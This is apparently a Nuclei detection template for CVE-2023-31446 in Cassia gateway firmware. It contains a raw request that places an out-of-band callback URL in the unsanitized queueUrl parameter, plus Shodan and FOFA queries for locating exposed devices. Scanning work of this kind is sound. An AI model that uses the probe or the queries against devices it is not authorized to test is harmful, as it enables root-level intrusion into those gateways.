48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2023-31446
|
|
|
|
info:
|
|
name: Cassia Gateway Firmware - Remote Code Execution
|
|
author: DhiyaneshDk
|
|
severity: critical
|
|
description: |
|
|
In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-89ph-wr9x-hcfc
|
|
- https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution
|
|
- https://vuldb.com/?id.250210
|
|
- https://blog.kscsc.online/cves/202331446/md.html
|
|
- https://www.cassianetworks.com
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-31446
|
|
epss-score: 0.01982
|
|
epss-percentile: 0.8876
|
|
cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: cassianetworks
|
|
product: xc1000_firmware
|
|
shodan-query: html:"Cassia Bluetooth Gateway Management Platform"
|
|
fofa-query: body="cassia bluetooth gateway management platform"
|
|
tags: cve,cve2023,rce,cassia,gateway
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
regex:
|
|
- "^OK$"
|
|
# digest: 4a0a00473045022100b412c7a9620de402b8322d4bbe35449064130bda28901dc50fd28f2a54b930960220306ddf4ede99885b0a0aa2d242b0f239a1b4fd44810791fc73d706723914f12e:922c64590222798bb761d5b6d8e72950 |